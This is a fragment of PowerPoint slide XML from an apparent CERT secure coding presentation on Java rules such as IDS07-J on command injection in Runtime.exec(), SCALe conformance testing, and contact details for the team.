                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> " + dir}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rounded Rectangular Callout 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="967596" y="1752600"/>
            <a:ext cx="5661804" cy="852267"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -12759"/>
              <a:gd name="adj2" fmla="val 72342"/>
              <a:gd name="adj3" fmla="val 16667"/>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2309" tIns="46154" rIns="92309" bIns="46154" numCol="1" rtlCol="0" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prevents command injection but does not guarantee that the command succeeds.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42285902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pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Secure Coding and SCALe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>SER07-J. Do not use the default serialized form for classes with implementation-defined invariants </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>EXP04-J</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>. Do not pass arguments to certain Java Collections Framework methods that are a different type than the collection parameter type </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>OBJ03-J. Prevent heap pollution </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>IDS07-J</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>. Do not pass untrusted, unsanitized data to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Runtime.exec()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>method</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Summary</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2483587839"/>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Java Coding Guidelines: Now Available </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Free</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Online</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Intended primarily for software professionals working in Java Standard Edition (SE) 7 Platform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>environments.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The CERT Secure Coding Team plans to update both </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>The CERT Oracle Secure Coding Standard for Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> and the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>Java Coding Guidelines</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> to Java Standard Edition (SE) 8 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>We encourage </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>the community to participate in the process by creating an account on the secure coding wiki and leaving comments or by contacting the team at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>secure-coding@cert.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>to become an editor.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>For free online access to the content of Java Coding Guidelines, visit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.securecoding.cert.org/confluence/display/jg/Java+Coding+Guidelines</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1205810170"/>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www.polycom.com/content/dam/polycom/www/images/aboutus/contact-us/contactus-main-world.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{BEBA8EAE-BF5A-486C-A8C5-ECC9F3942E4B}">
                <a14:imgProps xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a14:imgLayer r:embed="rId4">
                    <a14:imgEffect>
                      <a14:sharpenSoften amount="-41000"/>
                    </a14:imgEffect>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0" y="-1"/>
            <a:ext cx="9144000" cy="6477001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="922626" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>For More Information</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="922648" name="Group 24"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1371147477"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1303338"/>
          <a:ext cx="8196517" cy="4602480"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4119817"/>
                <a:gridCol w="4076700"/>
              </a:tblGrid>
              <a:tr h="2400300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>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1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>Robert C. Seacord</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Telephone:  +1 412-268-7608</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Email:  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>rcs@cert.org</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="95000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPct val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="25000"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzPct val="70000"/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                      </a:pPr>
                      <a:endParaRPr kumimoji="0" lang="en-US" sz="400" b="1"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1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>David Svoboda</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Telephone:  +1 412-268-3965</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Email:  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>svoboda@cert.org</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="95000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPct val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="25000"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzPct val="70000"/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                      </a:pPr>
                      <a:endParaRPr kumimoji="0" lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Arial" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0"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1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>U.S. Mail</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Software Engineering Institute</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Customer Relations</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4500 Fifth Avenue</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Pittsburgh, PA 15213-2612</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USA</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" sz="2000" b="1"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95000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPct val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="25000"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzPct val="70000"/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                      </a:pPr>
                      <a:endParaRPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Arial" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" horzOverflow="overflow">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR cap="flat">
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT cap="flat">
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="2057400">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>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1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>Web</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hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>www.cert.org/secure-coding</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t> </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hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>www.securecoding.cert.org</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" sz="20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                     </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="95000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPct val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="25000"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzPct val="70000"/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                      </a:pPr>
                      <a:endParaRPr kumimoji="0" lang="en-US" sz="20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Secure Coding Forum</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0"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95000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPct val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="25000"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzPct val="70000"/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst>
                          <a:tab pos="1311275" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>Subscribe to the CERT Secure Coding </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>eNewsletter</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" sz="20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95000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPct val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="25000"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzPct val="70000"/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst>
                          <a:tab pos="1311275" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>mailto</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>: info@sei.cmu.edu</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" horzOverflow="overflow">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR cap="flat">
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB cap="flat">
                      <a:noFill/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 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419600" y="4876800"/>
            <a:ext cx="3931519" cy="1103068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="http://intraweb.stockton.edu/eyos/facebook/images/linkedin-logo.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01770" y="5085697"/>
            <a:ext cx="1438275" cy="4062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751687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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SCALe Conformance Testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>The use of secure coding standards defines a proscriptive set of rules and recommendations to which the source code can be evaluated for compliance.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>each secure coding standard, the source code is certified as provably nonconforming, conforming, or provably conforming against each guideline in the standard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="ＭＳ Ｐゴシック"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="ＭＳ Ｐゴシック"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="ＭＳ Ｐゴシック"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="ＭＳ Ｐゴシック"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="ＭＳ Ｐゴシック"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="ＭＳ Ｐゴシック"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Evaluation violations of a particular rule ends when a “provably nonconforming” violation is discovered.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="ＭＳ Ｐゴシック"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Table 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="99612674"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685800" y="3200400"/>
          <a:ext cx="7315200" cy="1950720"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1697263"/>
                <a:gridCol w="5617937"/>
              </a:tblGrid>
              <a:tr h="731520">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="l">
